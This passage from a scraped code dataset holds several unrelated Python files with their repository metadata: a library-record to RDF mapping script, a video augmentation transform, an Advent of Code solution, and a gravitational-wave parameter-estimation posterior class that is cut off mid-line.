\"http://rdaregistry.info/Elements/u/\",\n \"umbel\": \"http://umbel.org/umbel/\",\n \"isbd\": \"http://iflastandards.info/ns/isbd/elements/\",\n \"schema\": \"http://schema.org/\",\n \"rdfs\": \"https://www.w3.org/TR/rdf-schema/#\",\n \"issued\": {\n \"@id\": \"dct:issued\",\n \"@type\": \"xsd:gYear\"\n },\n \"identifier\": {\n \"@id\": \"dct:identifier\",\n \"@type\": \"xsd:string\"\n },\n \"language\": {\n \"@id\": \"http://purl.org/dc/terms/language\",\n \"@container\": \"@language\"\n },\n \"openAccessContent\": \"http://dbpedia.org/ontology/openAccessContent\",\n}\n\n\nmapping = {\n \"@context\": putContext,\n \"@id\": {getAtID: \"id\"},\n \"identifier\": {getIDs: [\"swb_id_str\", \"kxp_id_str\"]},\n \"bibo:issn\": {getProperty: \"issn\"},\n \"bibo:isbn\": {getProperty: \"isbn\"},\n \"umbel:isLike\": {getProperty: \"url\"},\n \"dct:title\": {getTitle: \"title\"},\n \"rdau:P60493\": {getTitle: [\"title_part\", \"title_sub\"]},\n \"bibo:shortTitle\": {getTitle: \"title_short\"},\n \"dct:alternative\": {getTitle: \"title_alt\"},\n \"rdau:P60327\": {getProperty: \"author\"},\n \"dc:contributor\": {getProperty: \"author2\"},\n # \"author_id\":{getGND:\"author_id\"},\n \"rdau:P60333\": {getProperty: \"imprint_str_mv\"},\n \"rdau:P60163\": {getProperty: \"publishPlace\"},\n \"dct:publisher\": {getProperty: \"publisher\"},\n \"issued\": {getIssued: \"publishDate\"},\n \"rdau:P60489\": {getProperty: \"dissertation_note\"},\n \"isbd:P1053\": {getProperty: \"physical\"},\n \"language\": {getLanguage: \"language\"},\n \"dct:isPartOf\": {getIsPartOf: \"hierarchy_top_id\"},\n \"dct:bibliographicCitation\": {getProperty: [\"container_title\", \"container_reference\"]},\n \"rdfs:ch_type\": {getFormatRdfType: \"format_finc\"},\n \"dct:medium\": {getFormatDctMedium: \"format_finc\"},\n \"openAccessContent\": {getoAC: \"facet_avail\"},\n \"schema:offers\": {getOfferedBy: \"record_id\"},\n \"bf:contribution\": {get_contributon: \"fullrecord\"},\n \"umbel:relatesToNotation\": {get_rvk: \"rvk_facet\"}\n}\n\n\ndef process_field(record, source_field):\n ret = []\n if isinstance(source_field, dict):\n for function, parameter in source_field.items():\n ret.append(function(record, parameter))\n elif isinstance(source_field, str):\n return value\n elif isinstance(source_field, list):\n for elem in value:\n ret.append(ArrayOrSingleValue(process_field(record, elem)))\n elif callable(source_field):\n return ArrayOrSingleValue(source_field(record))\n if ret:\n return ArrayOrSingleValue(ret)\n\n\ndef removeNone(obj):\n if isinstance(obj, (list, tuple, set)):\n return type(obj)(removeNone(x) for x in obj if x is not None)\n elif isinstance(obj, dict):\n return type(obj)((removeNone(k), removeNone(v))\n for k, v in obj.items() if k is not None and v is not None)\n else:\n return obj\n\n\nlock = Lock()\n\n\ndef process_line(record):\n try:\n mapline = {}\n for key, val in mapping.items():\n value = process_field(record, val)\n if value:\n mapline[key] = value\n mapline = removeNone(mapline)\n if mapline:\n with lock:\n sys.stdout.write(json.dumps(mapline, indent=None)+\"\\n\")\n sys.stdout.flush()\n except Exception as e:\n with open(\"errors.txt\", 'a') as f:\n traceback.print_exc(file=f)\n\n\ndef gen_solrdump_cmd(host):\n fl = set()\n for k, v in mapping.items():\n if not callable(v):\n for c, w in v.items():\n if isinstance(w, str):\n fl.add(w)\n elif isinstance(w, list):\n for elem in w:\n fl.add(elem)\n return \"solrdump -verbose -server {} -fl {}\".format(host, ','.join(fl))\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='simple LOD Mapping of FINC-Records')\n parser.add_argument('-gen_cmd', action=\"store_true\",\n help='generate bash command')\n parser.add_argument(\n '-server', type=str, help=\"which server to use for harvest, only used for cmd prompt definition\")\n args = parser.parse_args()\n if args.gen_cmd:\n print(gen_solrdump_cmd(args.server))\n quit()\n p = Pool(4)\n for line in sys.stdin:\n p.apply_async(process_line, args=(json.loads(line),))\n #target_record=process_line(json.loads(line))\n #if target_record:\n #print(json.dumps(target_record))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"slub/efre-lod-elasticsearch-tools","sub_path":"processing/finc2rdf.py","file_name":"finc2rdf.py","file_ext":"py","file_size_in_byte":23802,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"}
+{"seq_id":"69890583792","text":"# Kinetics default transform in MViT\n# from https://github.com/facebookresearch/SlowFast/\n# https://arxiv.org/pdf/2104.11227.pdf\nimport torch\nfrom torchvision import transforms\n\nfrom utils import clip_transforms\nfrom .rand_augment import rand_augment_transform\nfrom .random_erasing import RandomErasing\nfrom PIL import Image\n\n\ndef mvit_transform(args):\n auto_augment = \"rand-m7-n4-mstd0.5-inc1\"\n\n img_size_min = args.crop_size\n aa_params = {\"translate_const\": int(img_size_min * 0.45)}\n aa_params[\"interpolation\"] = Image.BICUBIC\n\n aug_transform = transforms.Compose([\n clip_transforms.ClipRandomResizedCrop(args.crop_size, scale=(0.08, 1.), ratio=(0.75, 1.3333333333333333)),\n rand_augment_transform(auto_augment, aa_params),\n clip_transforms.ClipRandomHorizontalFlip(p=0.0 if args.no_horizontal_flip else 0.5),\n clip_transforms.ToClipTensor(),\n clip_transforms.ClipNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n transforms.Lambda(lambda clip: torch.stack(clip, dim=0)), # T, C, H, W\n RandomErasing(0.25, mode=\"pixel\", max_count=1, num_splits=False, device=\"cpu\"),\n transforms.Lambda(lambda clip: torch.transpose(clip, 0, 1)) # C, T, H, W\n ])\n\n return aug_transform","repo_name":"ZhaofanQiu/Optimization-Planning-for-3D-ConvNets","sub_path":"utils/mvit_transform/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"72384438829","text":"with open('data/my_input/15.in') as f:\n lines = [ line.strip() for line in f]\n\nwith open('data/test/15.test') as f2:\n tests = [ test.strip() for test in f2]\n\ndef part1(vlines,num):\n d=dict()\n li= ''.join(vlines).split(\",\")\n r=1\n \n lastindex=dict()\n for i,j in enumerate(li):\n lastindex[int(j)]=i+1\n prev=int(j)\n r=i+1\n\n new=True\n while r!=num:\n r+=1\n if new :\n \n #speak\n prev=0\n \n #precalculate\n if prev in lastindex:\n d[prev]=r-lastindex[prev]\n new=False\n else:\n new=True\n \n \n #record\n lastindex[prev]=r\n\n else:\n #speak\n prev=d[prev]\n\n #precalculate\n if prev in lastindex:\n new=False\n d[prev]=r-lastindex[prev]\n else:\n new=True\n\n #record\n lastindex[prev]=r\n \n return prev\n\n\nprint(\"test part1\",part1(tests,2020))\nprint(\"output part1\",part1(lines,2020))\nprint(\"test part2\",part1(tests,30000000))\nprint(\"output part2\",part1(lines,30000000))","repo_name":"cthiounn/adventofcode-2020-python","sub_path":"day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"24827630366","text":"import numpy as np\nimport fftw3\nimport lal\nimport lalsimulation as ls\nfrom posterior_utils import *\nfrom pylal import SimInspiralUtils\nimport scipy.interpolate as si\nimport scipy.stats as st\nimport utils as u\n\nclass Posterior(object):\n \"\"\"Callable object representing the posterior.\"\"\"\n\n def __init__(self, time_data=None, freq_data=None,\n inj_params=None, inj_xml=None, event=0, srate=16384,\n T=None, time_offset=lal.LIGOTimeGPS(0),\n approx=ls.TaylorF2, amp_order=-1, phase_order=-1,\n fmin=20.0, fref=100.0, malmquist_snr=None, mmin=1.0,\n mmax=35.0, dmax=1000.0, dataseed=None,\n data_psdparams=None, detectors=['H1', 'L1', 'V1'],\n psd=None, npsdfit=4):\n r\"\"\"Set up the posterior. Currently only does PE on H1 with iIGOIGO\n analytic noise spectrum.\n\n :param time_data: A list of float arrays giving the\n time-domain data in each detector on which the analysis is\n to operate. If ``None``, then data are generated from\n Gaussian noise. The time-domain data will be windowed with\n the default Tukey window from :func:`u.tukey_window` before\n being Fourier-transformed.\n\n :param freq_data: A list of complex arrays giving the\n frequency-domain data in each detector on which the analysis\n is to operate. If both ``time_data`` and ``freq_data`` are\n ``None`` then data are generated from Gaussian noise.\n\n :param inj_params: Parameters for a waveform to be injected.\n\n :param inj_xml: XML filename describing a waveform to be\n injected.\n\n :param event: The event number (starting with zero) of the\n injection from the XML.\n\n :param srate: The sample rate, in Hz.\n\n :param T: The total length of the data segment (in seconds).\n If ``None``, extracted from ``time_data``.\n\n :param time_offset: The GPS start time of the segment being\n analyized.\n\n :param approx: The waveform approximant to use (currently only\n frequency-domain waveforms are supported).\n\n :param amp_order: The amplitude order parameter for the\n waveform. Use ``-1`` for maximum order.\n\n :param phase_order: The phase order for the waveform. Use\n ``-1`` for maximum order.\n\n :param fmin: The minimum frequency for the analysis.\n\n :param fref: The reference frequency where freq-dependent\n waveform quantities are computed.\n\n :param malmquist_snr: If not ``None``, gives the SNR threshold\n in the second-loudest detector (or only detector) below\n which the prior probability is zero.\n\n :param mmin: Minimum component mass threshold.\n\n :param mmax: Maximum component mass threshold.\n \n :param dmax: Maximum distance.\n\n :param dataseed: If not ``None``, will be used as a RNG seed\n for generating any synthetic data.\n\n :param data_psdparams: If not ``None``, the PSD fitting\n parameters to be used to modify the PSD when producing\n synthetic data. This argument only makes sense when both\n ``time_data`` and ``freq_data`` are ``None``.\n\n :param detectors: The detectors on which the analysis runs.\n\n :param psd: A list of PSDs to use instead of the synthetic\n AdLIGO PSD from LALSimultion. There should be one PSD per\n detector.\n\n :param npsdfit: The number of PSD fitting parameters to use.\n\n \"\"\"\n\n self._srate = srate\n self._time_offset = u.GPSTime(time_offset.gpsSeconds, time_offset.gpsNanoSeconds)\n self._approx = approx\n self._amp_order = amp_order\n self._phase_order = phase_order\n self._fmin = fmin\n self._fref = fref\n self._msnr = malmquist_snr\n self._mmin = mmin\n self._mmax = mmax\n self._dmax = dmax\n self._detectors = detectors\n\n if T is None:\n self._T = time_data[0].shape[0]/srate\n else:\n self._T = T\n\n data_length = int(round(self.T*self.srate/2+1))\n\n self._fs = np.linspace(0, srate/2.0, self.T*self.srate/2+1)\n\n self._npsdfit = npsdfit\n self._psdfitfs = np.exp(np.linspace(np.log(self.fmin), np.log(self.fs[-1]), self.npsdfit))\n\n if psd is not None:\n # Cut the PSD down to length if it's too long\n self._psd = [p[:self.fs.shape[0]] for p in psd]\n else:\n self._psd = [np.zeros(self.fs.shape[0]) for d in detectors]\n for d, psd in zip(detectors, self.psd):\n if d[0] == 'H' or d[0] == 'L':\n for i in range(self.fs.shape[0]):\n psd[i] = ls.SimNoisePSDaLIGOZeroDetHighPower(self.fs[i])\n elif d[0] == 'V':\n for i in range(self.fs.shape[0]):\n psd[i] = ls.SimNoisePSDAdvVirgo(self.fs[i])\n\n # Zero out PSD below fmin\n for p in self.psd:\n p[self.fs < fmin] = float('inf')\n\n if time_data is None and freq_data is None:\n self._data = [np.zeros(data_length, dtype=np.complex) for d in detectors]\n\n # Maybe set seed?\n if dataseed is not None:\n old_state = np.random.get_state()\n np.random.seed(dataseed)\n \n if data_psdparams is not None:\n params = np.zeros(1, dtype=self.dtype)\n params['psdfit'] = data_psdparams\n psd = self.adjusted_psd(params)\n else:\n psd = self.psd\n\n for j in range(len(detectors)):\n # 0.5 = 2 * 1/sqrt(2). One sqrt(2) from\n # one-sided-->two-sided, and the other from <|z|> =\n # sqrt(2) if x,y ~ N(0,1).\n self.data[j] = 0.5*np.sqrt(psd[j]/(self.fs[1]-self.fs[0]))*(np.random.normal(size=data_length) +\n np.random.normal(size=data_length)*1j)\n self.data[j][psd[j]==float('inf')] = 0.0\n\n # Reset random state\n if dataseed is not None:\n np.random.set_state(old_state)\n elif time_data is None:\n self._data = freq_data\n else:\n self._data = []\n for i in range(len(detectors)):\n N = time_data[i].shape[0]\n\n this_srate = float(N)/self.T\n dt = 1.0/this_srate\n\n window = u.tukey_window(N)\n\n fdata = np.fft.rfft(time_data[i]*window)*dt\n\n # Now cut down to the actual sample rate\n self._data.append(fdata[:data_length])\n\n self._c2r_input_fft_array = np.zeros(self.data[0].shape[0], dtype=np.complex128)\n self._c2r_output_fft_array = np.zeros((self.data[0].shape[0]-1)*2, dtype=np.float64)\n self._c2r_fft_plan = fftw3.Plan(inarray=self.c2r_input_fft_array, outarray=self.c2r_output_fft_array, \n direction='forward', flags=['measure']) \n\n self._r2c_input_fft_array = np.zeros((self.data[0].shape[0]-1)*2, dtype=np.float64)\n self._r2c_output_fft_array = np.zeros(self.data[0].shape[0], dtype=np.complex128)\n self._r2c_fft_plan = fftw3.Plan(inarray=self.r2c_input_fft_array, outarray=self.r2c_output_fft_array, direction='forward', flags=['measure'])\n\n if inj_xml is not None:\n params = self.inj_xml_to_params(inj_xml)\n hs = self.generate_waveform(params)\n for i, h in enumerate(hs):\n self.data[i] += h\n elif inj_params is not None:\n hs = self.generate_waveform(inj_params)\n for i,h in enumerate(hs):\n self.data[i] += h\n \n # Handle unpickling the internal state\n def __setstate__(self, state):\n for k,v in state.items():\n self.__dict__[k] = v\n\n # Just the FFTW3 Plans are screwed up:\n self._r2c_fft_plan = fftw3.Plan(inarray=self.r2c_input_fft_array, outarray=self.r2c_output_fft_array, direction='forward', flags=['measure'])\n self._c2r_fft_plan = fftw3.Plan(inarray=self.c2r_input_fft_array, outarray=self.c2r_output_fft_array, direction='forward', flags=['measure']) \n\n @property\n def data(self):\n \"\"\"The frequency-domain data on which the analysis will be conducted.\"\"\"\n return self._data\n\n @property\n def T(self):\n \"\"\"The length (in seconds) of the input data segment.\"\"\"\n return self._T\n\n @property\n def fs(self):\n \"\"\"The frequencies (in Hz) that correspond to the frequency domain data.\"\"\"\n return self._fs\n\n @property\n def df(self):\n \"\"\"The spacing in frequency space.\n\n \"\"\"\n return self.fs[1]-self.fs[0]\n\n @property\n def srate(self):\n \"\"\"The sample rate of the time-domain data.\"\"\"\n return self._srate\n \n @property\n def time_offset(self):\n \"\"\"The GPS time of the start of the data segment.\"\"\"\n return self._time_offset\n\n @property \n def approx(self):\n \"\"\"The waveform approximant.\"\"\"\n return self._approx\n\n @property\n def amp_order(self):\n \"\"\"Amplitude order (``-1`` for max order).\"\"\"\n return self._amp_order\n\n @property\n def phase_order(self):\n \"\"\"The phase order (``-1`` for max order).\"\"\"\n return self._phase_order\n\n @property\n def fmin(self):\n \"\"\"The minimum frequency of the analysis.\"\"\"\n return self._fmin\n\n @property\n def fref(self):\n \"\"\"The reference frequency at which freq-dependent waveform quantities\n are defined.\"\"\"\n\n return self._fref\n\n @property\n def psd(self):\n \"\"\"The array of (one-sided) noise PSDs used in the analysis (one per\n detector).\"\"\"\n return self._psd\n\n @property\n def npsdfit(self):\n \"\"\"The number of PSD fitting parameters to use.\n\n \"\"\"\n\n return self._npsdfit\n\n @property\n def psdfitfs(self):\n \"\"\"The frequencies at which the PSD fit spline knots live.\n\n \"\"\"\n\n return self._psdfitfs\n\n @property\n def msnr(self):\n \"\"\"The SNR below which the prior goes to zero (or ``None`` for no threshold).\"\"\"\n return self._msnr\n\n @property\n def mmin(self):\n \"\"\"The minimum component mass.\"\"\"\n return self._mmin\n\n @property\n def mmax(self):\n \"\"\"The maximum component mass.\"\"\"\n return self._mmax\n\n @property\n def dmax(self):\n \"\"\"The maximum distance.\"\"\"\n return self._dmax\n\n @property\n def detectors(self):\n return self._detectors\n\n @property\n def ndetectors(self):\n return len(self.detectors)\n\n @property \n def c2r_input_fft_array(self):\n return self._c2r_input_fft_array\n\n @property\n def c2r_output_fft_array(self):\n return self._c2r_output_fft_array\n\n @property\n def c2r_fft_plan(self):\n return self._c2r_fft_plan\n\n @property\n def r2c_input_fft_array(self):\n return self._r2c_input_fft_array\n\n @property\n def r2c_output_fft_array(self):\n return self._r2c_output_fft_array\n\n @property\n def r2c_fft_plan(self):\n return self._r2c_fft_plan\n\n @property\n def nparams(self):\n \"\"\"The dimensionality of the parameter space.\"\"\"\n return 15 + self.ndetectors*self.npsdfit\n\n @property\n def header(self):\n \"\"\"A useful header describing the parameters for this posterior in text files.\n\n \"\"\"\n\n header = ['log_mc', 'eta', 'cos_iota', 'phi', 'psi', 'time', 'ra',\n 'sin_dec', 'log_dist', 'a1', 'cos_tilt1', 'phi1', 'a2', 'cos_tilt2', \n 'phi2']\n\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n def to_params(self, p):\n return p.view([('log_mc', np.float),\n ('eta', np.float),\n ('cos_iota', np.float),\n ('phi', np.float),\n ('psi', np.float),\n ('time', np.float),\n ('ra', np.float),\n ('sin_dec', np.float),\n ('log_dist', np.float), \n ('a1', np.float),\n ('cos_tilt1', np.float),\n ('phi1', np.float),\n ('a2', np.float),\n ('cos_tilt2', np.float),\n ('phi2', np.float)] + [('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n\n def adjusted_psd(self, params):\n \"\"\"Returns a PSD for each detector, adjusted by the PSD parameters for\n that detector.\n\n \"\"\"\n\n if self.npsdfit == 0:\n return self.psd\n\n params = self.to_params(params)\n sel = self.fs >= self.fmin\n\n fs = self.fs[sel]\n\n psds = []\n\n for raw_psd, psdp in zip(self.psd, params['psdfit'].squeeze()):\n log_factors = si.InterpolatedUnivariateSpline(np.log(self.psdfitfs), psdp)(np.log(fs))\n\n psd = raw_psd.copy()\n psd[sel] *= np.exp(log_factors)\n\n psds.append(psd)\n\n return psds\n\n def inj_xml_to_params(self, inj_xml, event=0, psdfit=None):\n \"\"\"Returns the parameters that correspond to the given XML file,\n optionally with the given PSD fitting parameters.\n\n :param inj_xml: Filename of the injection XML.\n\n :param event: The event number to use from the XML.\n\n :param psdfit: The PSD fitting parameters to add to the\n returned parameters.\n\n \"\"\"\n\n p = self.to_params(np.zeros(self.nparams))\n\n table = SimInspiralUtils.ReadSimInspiralFromFiles([inj_xml])[event]\n\n p['log_mc'] = np.log(table.mchirp)\n p['eta'] = table.eta\n p['log_dist'] = np.log(table.distance)\n p['ra'] = table.longitude\n p['sin_dec'] = np.sin(table.latitude)\n p['cos_iota'] = np.cos(table.inclination)\n p['phi'] = table.coa_phase\n p['psi'] = table.polarization\n \n time_offset = self.time_offset.LIGOTimeGPS\n p['time'] = table.geocent_end_time - time_offset.gpsSeconds + 1e-9*(table.geocent_end_time_ns - time_offset.gpsNanoSeconds)\n\n s1 = np.array([table.spin1x, table.spin1y, table.spin1z])\n s2 = np.array([table.spin2x, table.spin2y, table.spin2z])\n\n Lhat = np.array([np.sin(table.inclination), 0.0, np.cos(table.inclination)])\n xhat = np.array([np.cos(table.inclination), 0.0, -np.sin(table.inclination)])\n yhat = np.array([0.0,1.0,0.0])\n\n if np.linalg.norm(s1) == 0.0:\n p['a1'] = 0.0\n p['cos_tilt1'] = 1.0\n p['phi1'] = 0.0\n else:\n a1 = np.linalg.norm(s1)\n p['a1'] = a1\n p['cos_tilt1'] = np.dot(s1, Lhat)/a1\n p['phi1'] = np.arctan2(np.dot(s1, yhat), np.dot(s1, xhat))\n if p['phi1'] < 0.0:\n p['phi1'] += 2.0*np.pi\n\n if np.linalg.norm(s2) == 0.0:\n p['a2'] = 0.0\n p['cos_tilt2'] = 1.0\n p['phi2'] = 0.0\n else:\n a2 = np.linalg.norm(s2)\n p['a2'] = a2\n p['cos_tilt2'] = np.dot(s2, Lhat)/a2\n p['phi2'] = np.arctan2(np.dot(s2, yhat), np.dot(s2, xhat))\n if p['phi2'] < 0.0:\n p['phi2'] += 2.0*np.pi\n\n if psdfit is not None:\n p['psdfit'] = psdfit\n\n return p\n\n\n def generate_waveform(self, params):\n \"\"\"Returns a frequency-domain strain suitable to subtract from the\n frequency-domain data (i.e. the samples line up in frequency\n space).\n \"\"\"\n\n params = self.to_params(params).squeeze()\n\n # Can only handle one parameter set at a time, so extract\n # first from array if more than one.\n if isinstance(params, np.ndarray) and params.ndim > 0:\n params = params[0]\n elif isinstance(params, np.ndarray):\n params = params[()]\n \n m1,m2 = u.mc_eta_to_masses(np.exp(params['log_mc']), params['eta'])\n d = 1e6*lal.PC_SI*np.exp(params['log_dist'])\n i = np.arccos(params['cos_iota'])\n\n dec = np.arcsin(params['sin_dec'])\n\n inc = np.arccos(params['cos_iota'])\n\n a1 = params['a1']\n tilt1 = np.arccos(params['cos_tilt1'])\n phi1 = params['phi1']\n a2 = params['a2']\n tilt2 = np.arccos(params['cos_tilt2'])\n phi2 = params['phi2']\n\n zhat = np.array([np.sin(inc), 0.0, np.cos(inc)])\n xhat = np.array([np.cos(inc), 0.0, -np.sin(inc)])\n yhat = np.array([0.0, 1.0, 0.0])\n\n s1 = a1 * (np.cos(phi1)*np.sin(tilt1)*xhat +\\\n np.sin(phi1)*np.sin(tilt1)*yhat +\\\n np.cos(tilt1)*zhat)\n s2 = a2 * (np.cos(phi2)*np.sin(tilt2)*xhat +\\\n np.sin(phi2)*np.sin(tilt2)*yhat +\\\n np.cos(tilt2)*zhat)\n\n if ls.SimInspiralImplementedFDApproximants(self.approx) == 1:\n hplus,hcross = ls.SimInspiralChooseFDWaveform(params['phi'], \n self.fs[1]-self.fs[0],\n m1*lal.MSUN_SI, m2*lal.MSUN_SI, \n s1[0], s1[1], s1[2],\n s2[0], s2[1], s2[2],\n self.fmin, self.fs[-1], 100.0,\n d, i, \n 0.0, 0.0,\n None, None, \n self.amp_order, self.phase_order, \n self.approx)\n\n hpdata = hplus.data.data\n hcdata = hcross.data.data\n\n # If necessary, cut down to size\n if hpdata.shape[0] > self.fs.shape[0]:\n hpdata = hpdata[:self.fs.shape[0]]\n hcdata = hcdata[:self.fs.shape[0]]\n else:\n hplus,hcross = ls.SimInspiralChooseTDWaveform(params['phi'],\n 1.0/self.srate,\n m1*lal.MSUN_SI, m2*lal.MSUN_SI, \n s1[0], s1[1], s1[2],\n s2[0], s2[1], s2[2],\n self.fmin, self.fref,\n d, i, \n 0.0, 0.0,\n None, None, \n self.amp_order, self.phase_order, \n self.approx)\n \n Ntime = (self.data[0].shape[0]-1)*2\n \n # Cut down to length if necessary\n hpdata = hplus.data.data\n hcdata = hcross.data.data\n tC_index = int(round(-(hplus.epoch.gpsSeconds + 1e-9*hplus.epoch.gpsNanoSeconds)*self.srate))\n if hpdata.shape[0] > Ntime:\n tC_index -= hpdata.shape[0] - Ntime\n hpdata = hpdata[-Ntime:]\n hcdata = hcdata[-Ntime:]\n\n # Now Fourier transiform; place the waveform's tC index\n # into the zero index of the FT array\n Nbegin = hpdata.shape[0] - tC_index\n\n self.r2c_input_fft_array[:] = 0.0\n self.r2c_input_fft_array[:Nbegin] = hpdata[tC_index:]\n self.r2c_input_fft_array[-tC_index:] = hpdata[:tC_index]\n self.r2c_fft_plan()\n hpdata = self.r2c_output_fft_array / self.srate # multiply by dt\n \n self.r2c_input_fft_array[:] = 0.0\n self.r2c_input_fft_array[:Nbegin] = hcdata[tC_index:]\n self.r2c_input_fft_array[-tC_index:] = hcdata[:tC_index]\n self.r2c_fft_plan()\n hcdata = self.r2c_output_fft_array / self.srate # multiply by dt\n\n hout=[]\n for d in self.detectors:\n sec = self.time_offset.sec + int(params['time'])\n ns = self.time_offset.ns + int(round(1e9*(params['time']-int(params['time']))))\n\n while ns > 1e9:\n sec += 1\n ns -= 1e9\n \n tgps = lal.LIGOTimeGPS(sec, nanoseconds=ns)\n\n gmst = lal.GreenwichMeanSiderealTime(tgps)\n\n if d == 'H1':\n diff = lal.LALDetectorIndexLHODIFF\n elif d == 'L1':\n diff = lal.LALDetectorIndexLLODIFF\n elif d == 'V1':\n diff = lal.LALDetectorIndexVIRGODIFF\n else:\n raise ValueError('detector not recognized: ' + d)\n \n location = lal.CachedDetectors[diff].location\n\n timedelay = lal.TimeDelayFromEarthCenter(location, params['ra'], dec, tgps)\n\n timeshift = params['time'] + timedelay\n \n fplus, fcross = lal.ComputeDetAMResponse(lal.CachedDetectors[diff].response,\n params['ra'], dec, params['psi'], gmst)\n\n h = combine_and_timeshift(fplus, fcross, hpdata, hcdata, self.fs, timeshift)\n\n hout.append(h)\n\n return hout\n\n def malmquist_snr(self, params):\n \"\"\"Returns the SNR that will be used in the Malmquist threshold in the\n likelihood function.\n\n The malmquist SNR is either:\n\n * The SNR in the second-loudest detector if there are two or\n more detectors.\n\n * The SNR if there is only one detector.\n\n The intention is to approximate a coincidence threshold from a\n pipeline.\n\n \"\"\"\n\n hs = self.generate_waveform(params)\n df = self.fs[1] - self.fs[0]\n\n adj_psd = self.adjusted_psd(params)\n rhos = [np.sqrt(4.0*df*np.real(np.sum(np.conj(h)*h/psd))) for h, psd in zip(hs, adj_psd)]\n \n if len(rhos) > 1:\n rhos.sort()\n return rhos[-2]\n else:\n return rhos[0]\n\n def log_likelihood(self, params):\n r\"\"\"Returns the log likelihood of the given parameters. The\nlog-likelihood is\n\n .. math::\n \n \\log \\mathcal{L} = -\\frac{1}{2} \\left( \\left\\langle d | d \\right\\rangle -2 \\Re \\left\\langle d | h \\right\\rangle + \\left\\langle h | h \\right\\rangle \\right) - \\frac{1}{2} \\sum \\log S(f)\n\n where \n\n .. math::\n\n \\left\\langle a | b \\right\\rangle = 4 \\int df \\, \\frac{a^*(f) b(f)}{S(f)},\n\n where :math:`S(f)` is the one-sided noise power spectral density.\n\n This corresponds to the ususal log-likelihood in Gaussian\n noise, accounting for the fact that parameters can cause the\n PSD to vary.\n\n If the :attr:`Posterior.malmquest_snr` is not ``None``, then\n the likelihood will be returned as ``float('-inf')`` when\n :math:`\\left\\langle h | h \\right\\rangle^{1/2}` is smaller than\n :attr:`Posterior.malmquest_snr`\"\"\"\n\n hs = self.generate_waveform(params)\n df = self.fs[1] - self.fs[0]\n\n istart = np.nonzero(self.fs >= self.fmin)[0][0]\n\n hh_list=[]\n logl = 0.0\n adj_psd = self.adjusted_psd(params)\n for h, d, psd in zip(hs, self.data, adj_psd):\n hh,dh,dd = data_waveform_inner_product(istart, df, psd, h, d)\n\n hh_list.append(hh)\n\n logl += -0.5*(hh - 2.0*dh + dd)\n logl -= np.sum(np.log(2.0*np.pi*psd[istart:]/(4.0*(self.fs[1]-self.fs[0]))))\n\n # If malmquist priors, then cutoff when the SNR is too quiet.\n hh_list.sort()\n if self.msnr is not None:\n if len(hh_list) > 1 and hh_list[1] < self.msnr*self.msnr:\n return float('-inf')\n elif len(hh_list) == 1 and hh_list[0] < self.msnr*self.msnr:\n return float('-inf')\n\n return logl\n\n def log_prior(self, params):\n \"\"\"Returns the log of the prior. More details to follow. \n \"\"\"\n params = self.to_params(params)\n\n if isinstance(params, np.ndarray):\n params = params[0]\n\n if params['eta'] < 0 or params['eta'] > 0.25:\n return float('-inf')\n\n # First basic ranges on parameters:\n mc = np.exp(params['log_mc'])\n d = np.exp(params['log_dist'])\n m1,m2=u.mc_eta_to_masses(mc, params['eta'])\n mtot = m1+m2\n\n if m1 > self.mmax or m2 < self.mmin:\n return float('-inf')\n\n if params['cos_iota'] < -1.0 or params['cos_iota'] > 1.0:\n return float('-inf')\n\n if params['phi'] > 2.0*np.pi or params['phi'] < 0.0:\n return float('-inf')\n\n if params['psi'] > 2.0*np.pi or params['psi'] < 0.0:\n return float('-inf')\n\n if params['time'] < 0 or params['time'] > self.T:\n return float('-inf')\n\n if params['ra'] < 0.0 or params['ra'] > 2.0*np.pi:\n return float('-inf')\n\n if params['sin_dec'] < -1.0 or params['sin_dec'] > 1.0:\n return float('-inf')\n\n if d > self.dmax:\n return float('-inf')\n\n if params['a1'] <= 0.0 or params['a1'] >= 1.0:\n return float('-inf')\n\n if params['a2'] <= 0.0 or params['a2'] >= 1.0:\n return float('-inf')\n\n if params['cos_tilt1'] < -1.0 or params['cos_tilt1'] > 1.0:\n return float('-inf')\n\n if params['cos_tilt2'] < -1.0 or params['cos_tilt2'] > 1.0:\n return float('-inf')\n\n if params['phi1'] < 0.0 or params['phi1'] >= 2.0*np.pi:\n return float('-inf')\n\n if params['phi2'] < 0.0 or params['phi2'] >= 2.0*np.pi:\n return float('-inf')\n\n logp = 0.0\n\n # A flat prior in mass space gives the following in log(mc)-eta space:\n logp -= np.log(m1-m2) - 3.0*np.log(mtot)\n \n # Prior volumetric in distance:\n logp += 3.0*params['log_dist']\n\n # N(0,1) prior on PSD parameters (which are log(factor) at\n # each frequency).\n logp += np.sum(u.norm_logpdf(params['psdfit']))\n\n if isinstance(logp, np.ndarray):\n if logp.ndim > 0:\n logp = logp[0]\n else:\n logp = logp[()]\n\n return logp\n\n def draw_prior(self, shape=(1,)):\n params = self.to_params(np.zeros(shape+(self.nparams,))).squeeze()\n\n m1s = np.random.uniform(low=self.mmin, high=self.mmax, size=shape)\n m2s = np.random.uniform(low=self.mmin, high=self.mmax, size=shape)\n\n mc, eta = u.masses_to_mc_eta(m1s, m2s)\n\n params['log_mc'] = np.log(mc)\n params['eta'] = eta\n\n params['cos_iota'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['phi'] = np.random.uniform(low=0.0, high=np.pi, size=shape)\n params['psi'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['time'] = np.random.uniform(low=0.0, high=self.T, size=shape)\n params['ra'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['sin_dec'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['log_dist'] = np.log(self.dmax) + (1.0/3.0)*np.log(np.random.uniform(size=shape))\n params['a1'] = np.random.uniform(low=0.0, high=1.0, size=shape)\n params['a2'] = np.random.uniform(low=0.0, high=1.0, size=shape)\n params['cos_tilt1'] = np.random.uniform(low=-1.0, 